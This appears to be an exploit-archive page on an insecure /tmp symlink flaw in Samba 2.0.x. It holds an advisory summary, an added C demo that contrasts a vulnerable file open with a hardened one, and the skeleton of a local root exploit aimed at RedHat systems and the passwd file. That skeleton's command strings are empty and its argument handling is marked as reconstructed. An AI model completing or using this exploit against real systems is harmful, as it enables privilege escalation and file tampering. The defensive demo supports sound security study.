Samba 2.0.x - Insecure TMP File Symbolic Link

Samba is a flexible file sharing package maintained by the Samba development group. It provides interoperability between UNIX and Microsoft Windows systems, permitting the sharing of files and printing services.

A problem in the package could make it possible to deny service to legitimate users. Because Samba creates files in the /tmp file system insecurely, a local user can pre-create a symbolic link at the expected file name pointing at a file owned by a privileged user, such as a system device file, and Samba will follow the link and write data into that file.

This vulnerability makes it possible for a local user to deny service to other users of the system, and potentially gain elevated privileges. 
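The following program is an added example, not code from the advisory or from Samba. It reproduces the pattern described above in a scratch directory: a stand-in "victim" file plays the role of a privileged file, a symlink is planted at the predictable temp-file name, and the same write is attempted twice, once with the vulnerable open() flags and once with O_EXCL|O_NOFOLLOW. The directory, file names and sample data are constructed for the demo.

```c
/* Added example (not from the advisory or Samba): symlink attack on an
   insecurely created /tmp file, vulnerable open() beside a hardened one.
   Paths and data below are made up for the demonstration. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: create-or-truncate a predictable path. If an attacker
   has already planted a symlink there, open() follows it and the write lands
   in the symlink's target. Returns 0 on success, -1 on failure. */
int unsafe_tmp_write(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return (n == (ssize_t)strlen(data)) ? 0 : -1;
}

/* Hardened pattern: O_EXCL makes the create fail with EEXIST if anything,
   including a symlink, already sits at the path; O_NOFOLLOW additionally
   refuses to traverse a symlink as the final component (ELOOP). Either way
   the write never reaches the attacker's target. Returns 0 on success,
   -1 with errno set on failure. */
int safe_tmp_write(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return (n == (ssize_t)strlen(data)) ? 0 : -1;
}

struct demo_result {
    int unsafe_rc;        /* return of the vulnerable write (0 = "succeeded") */
    int victim_clobbered; /* 1 if the victim file now holds the attacker's data */
    int safe_rc;          /* return of the hardened write (-1 expected) */
    int safe_errno;       /* errno after the hardened write (EEXIST or ELOOP) */
};

/* Stage the attack: a stand-in for a privileged file (victim) and a symlink
   planted at the predictable temp name pointing at it. Returns 0 if the
   scenario could be set up, -1 otherwise. */
int run_demo(struct demo_result *r)
{
    char dir[] = "/tmp/symlink-demo-XXXXXX";   /* scratch dir, constructed */
    char victim[512], planted[512], buf[64] = {0};
    FILE *f;

    if (!mkdtemp(dir))
        return -1;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(planted, sizeof planted, "%s/predictable.tmp", dir);

    if (!(f = fopen(victim, "w")))
        return -1;
    fputs("original contents\n", f);
    fclose(f);
    if (symlink(victim, planted) != 0)     /* attacker plants the link */
        return -1;

    /* The vulnerable write follows the link and overwrites the victim. */
    r->unsafe_rc = unsafe_tmp_write(planted, "attacker data\n");
    if ((f = fopen(victim, "r"))) {
        if (!fgets(buf, sizeof buf, f))
            buf[0] = '\0';
        fclose(f);
    }
    r->victim_clobbered = (strcmp(buf, "attacker data\n") == 0);

    /* The hardened write refuses to create over the planted link. */
    errno = 0;
    r->safe_rc = safe_tmp_write(planted, "attacker data\n");
    r->safe_errno = errno;

    unlink(planted);
    unlink(victim);
    rmdir(dir);
    return 0;
}

int main(void)
{
    struct demo_result r;
    if (run_demo(&r) != 0) {
        perror("run_demo");
        return 1;
    }
    printf("unsafe open: rc=%d, victim clobbered=%d\n", r.unsafe_rc, r.victim_clobbered);
    printf("safe open:   rc=%d, errno=%s\n", r.safe_rc, strerror(r.safe_errno));
    return 0;
}
```

The fix is the open() flags, not the file name: O_EXCL turns "something is already there" into a hard failure, which is exactly the case an attacker's pre-planted symlink creates. In practice mkstemp() gives both an unpredictable name and O_EXCL semantics in one call.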

/*
 * Samba Server r00t exploit
 * Scope: Local (this exploit) and possible remote if conditions are given.
 * Vuln:
 *      RedHat 5.1
 *      RedHat 5.2
 *      RedHat 6.0
 *      RedHat 6.1
 *      RedHat 6.2
 *      RedHat 7.0
 *      RedHat 7.1
 *      I don't know if other versions are vulnerable too.
 * Run this exploit and then take a look at your passwd file.
 * Run: ./samba-exp user
 * Author:      Gabriel Maggiotti
 * Email:
 * Webpage:
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The shell commands carried in these strings are not preserved on the page;
   the initialisers are left empty rather than guessed. */
char inject1[]="";
char inject2[]="";
char inject3a[100]="";
char inject3b[]="";

int main(int argc,char *argv[])
{
        if(argc != 2) {
                fprintf(stderr,"usage: %s <user>\n",*argv);
                return 1;
        }

        /* The page declares inject3a as a 100-byte buffer and takes <user> on
           the command line, but does not preserve how the argument was spliced
           in. Appending <user> and inject3b is a reconstruction, bounded so it
           cannot overrun the buffer. */
        strncat(inject3a, argv[1], sizeof(inject3a)-strlen(inject3a)-1);
        strncat(inject3a, inject3b, sizeof(inject3a)-strlen(inject3a)-1);

        /* system() takes a single argument; the page's two-argument calls
           would not compile. */
        system(inject1);
        system(inject2);
        system(inject3a);

        return 0;
}